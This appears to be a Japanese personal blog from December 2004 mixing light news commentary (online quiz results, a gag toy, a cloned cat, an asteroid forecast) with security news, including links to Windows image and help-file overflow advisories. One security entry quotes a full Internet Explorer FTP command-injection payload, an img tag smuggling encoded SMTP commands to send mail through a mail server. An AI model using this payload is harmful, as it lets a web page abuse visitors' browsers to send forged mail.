[雑談] 2004年知ってる度テスト、ボキャ王

• 2004年知ってる度テスト (goo)

---

textileNice (いいですねー)
得点数：54ポイント (100ポイント中)とてもよくがんばっています。話題の言葉をもっと知るには、情報源として注目ワードやニュースを見るとよいでしょう。

• 語彙数推定テスト ボキャ王（ボキャキング） (goo)

---

textileあなたの語彙数 は 57100 語程度です。全体： あなたは全体28790人のうち6646位です。 性別： あなたは男性20544人のうち4902位です。 年齢： あなたは25歳から29歳の6068人のうち1174位です。 就学状況： あなたは社会人の15647人のうち4191位です。

深く考えずにチェックをするのがコツです。（ぇ[雑談] * 香港当局、おなら爆弾は危険として回収を命ず (なんでも評点)

---

textile海外ではこのところFart Bomb（おなら爆弾）というジョーク・トーイが出回っている。…まず、内側の風船を潰すと、“地獄から直輸入された悪魔の液体”が中から出てくる。その状態で袋を振ると、液体が粉と混ざって化学反応が起こり、袋全体が膨らむ。そして、ついには大きな“放屁音”と共に、この世のものとは思えないほど臭いガスが外に噴出するのだという。

強烈すぎて、吐き気・頭痛・目の痛みが起こる場合があるとか。(^-^;⇒* Pranks & Gag Gifts: Fart Bomb Bags

---

[セキュリティ] * Flashsky Security Advisory

---

• [AD_LAB-04004]Microsoft Windows LoadImage API Integer Buffer overflow

Xttp://www.xfocus.net/flashsky/icoExp/loadimage.htm

---

• [AD_LAB-04005]Microsoft Windows Kernel ANI File Parsing Crash Vulnerability

Xttp://www.xfocus.net/flashsky/icoExp/aniblue.htm

---

• [AD_LAB-04005]Microsoft Windows Kernel ANI File Parsing Dos Vulnerability

Xttp://www.xfocus.net/flashsky/icoExp/anidos.htm

---

• [AD_LAB-04006]Microsoft Windows winhlp32.exe Heap Overflow and Integer Buffer overflow Vulnerability (heap)

Xttp://www.xfocus.net/flashsky/icoExp/search.hlp

---

* (BOf)Xttp://www.xfocus.net/flashsky/icoExp/search1.hlp

---

そこはかとなくキケンな香り。リモートからのカーネルクラッシュのお話。（ちょっと怖かったのでイキナリ飛ばないようにリンクを変更しました。）[雑談] * 隠れオタが飲み会で一般人にされると困る質問

---

• ずきんさん

---

のところから。俺だったら・・・、

textile忘年会のシーズンです。隠れオタが一般人にされて回答に困る質問を挙げてください。順位選択項目有効票数（投票数）割合1休日の過ごし方 12(48)17%…………6ヲタクってどう思う？ 5(10)7%…………9ファッション関係 2(4)2%9趣味 2(3)2%…………12恋愛遍歴 1(4)1%

あたりを持て余すかも。アニメとかコミケとかは俺は全然。むしろ・・・(以下略)[セキュリティ] * [Full-Disclosure] Internet Explorer FTP client can be used to send mail

---

• 12月10日の日記

---

に書いた、Internet Explorer FTP Command Injection の問題を応用して、メールを送信できる、という指摘。(^-^;

textile<img src="**ftp://**foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a<>%0d%0aRCPT%20TO%3a<ian-example%40penguinhosting.net>%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20ian%40penguinhosting.net%0d%0a%0d%0ahacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net**:25**/" />

関連： * IE-FTP-SMTP-link

---

[セキュリティ] * Windowsの新しい欠陥を悪用するエクスプロイトコードが公開に (ITmedia)

---

textileWindowsのLoadImage機能にある脆弱性を悪用されると、ウェブサイトや電子メール内にある特別に作成されたイメージをコンピュータが表示した際に、そのPCが改ざんされる可能性がある。Windowsのヘルププログラムにあるもう1つの脆弱性も、ヘルプファイルを開くすべてのプログラムに影響する。…「いずれも比較的深刻な問題だ。イメージ処理を行うものや、ヘルプファイルを読み込むものに悪用される可能性がある」

この問題を利用したウィルス・ワームが出るのも時間の問題ですね。今はホリデーシーズンで人がいないので、「この種のものを発表するタイミングとしては、いまは最悪の時期にあたる」と。はい。(汗関連： * ISC SANS 2004-12-23

---

[動物] * ５万ドルでクローン猫　米でペットの「コピー」販売 (asahi.com)

---

textileかわいがっていた猫を亡くした愛猫家の女性の注文で、米国の会社が体細胞クローン技術を使ってクローン猫を誕生させ、配達していたことが２２日明らかになった。ペット商売にクローン技術を採り入れた米国初の事例だ。…料金は５万ドル（約５２０万円）だった。…専門家も「個性も含め、そっくりコピーするのは不可能」と指摘している。クローン動物に健康上の問題が起きやすいとの警告も出ている。

う゛ーん。可愛がっていた猫が不幸にも死んでしまったら、ゆっくり寝かせてあげましょうよ・・・。[セキュリティ] * 第2回 情報が漏れた！ まず何をすればいいのか？ (@IT)

---

textileインフラは何とかなりつつあるものの、顧客から「架空請求」に関するクレームがきた。調べてみると、どうも中村君の勤務先が管理している顧客情報が漏れた疑いが。ホントに中村君のところから情報が漏れたのか？ そしてどこからどう情報が漏れたのか？ 手を付けられるところから調べつつ、対策を検討することに……。

新にわか管理者奮闘記の第2回が公開されました。[雑談] * ２５年後に小惑星が衝突？　確率３００分の１、ＮＡＳＡ (asahi.com)

---

textile２０２９年に小惑星が地球に衝突するかもしれない——。そんな見通しを、米航空宇宙局（ＮＡＳＡ）の専門家が示した。…「この小惑星が２０２９年４月１３日に地球に衝突する確率は３００分の１だ」と述べ、衝突の際のエネルギーは広島型原爆の約１０万倍にあたる１６００メガトンほどと推定した。平野部に衝突すれば大都市と周辺部を壊滅させ、海に落ちても大津波を引き起こす恐れがあるという。

『アルマゲドン』、『ディープインパクト』、『アステロイド』な世界ですか。(汗今のうちから核兵器を載せた小惑星破壊船と、ノアの箱舟な巨大シェルターの準備を。**[追記]** を。本当にこんなのあるんですね。(^-^;⇒* 彗星に衝撃弾を打ち込む、NASA版『ディープ・インパクト』

---

[雑談] * 一人寂しくクリスマスを過ごす会

---

＠openmya-Hiki

textile**一人寂しくクリスマスを過ごす会って何ですか？**クリスマスだというのに一緒に過ごすパートナーがいない寂しい人たちの集団です。

だーれーだー！ 俺を勝手に名誉会員にしたのはっ！(笑)名誉会員って、もし今後彼女ができても抜けられない勢いの名称だな。(^-^;[IT] * SoftEther VPN User-mode Router 2.0 (SoftEther.com)

---

が発表されたようです。◆* ソフトイーサ、「筑波ACルータ」は一般ユーザー権限で利用可能に (CNET)

---

textileソフトイーサは、一般ユーザー権限でもリモートアクセスを実現できる「SoftEther VPN User-mode Router 2.0」のβ1の無償ダウンロードを開始した。インストールや動作が一般ユーザー権限で可能になるほか、仮想NATサーバおよび仮想DHCPサーバがユーザーモードで動作するため、カーネルモード特権が一切行使されなくなっている。問題発生時にも、管理者権限で動作させているよりも影響する範囲が少なく、セキュリティも飛躍的に向上した。

頭がイタイ管理者の方、多いんでしょうね．．．(^-^;[雑談] * 「フィッシング詐欺」被害を初めて確認と警察庁 (ZAKZAK)

---

textile警察庁は２４日、銀行など企業からのメールを装って受信者が偽のホームページ（ＨＰ）にアクセスするよう仕向け、入力させた個人情報を悪用して金品をだまし取る「フィッシング詐欺」の被害を、初めて確認したと発表した。

なーんで今ごろになってやっと“初めて確認”なんだろう？！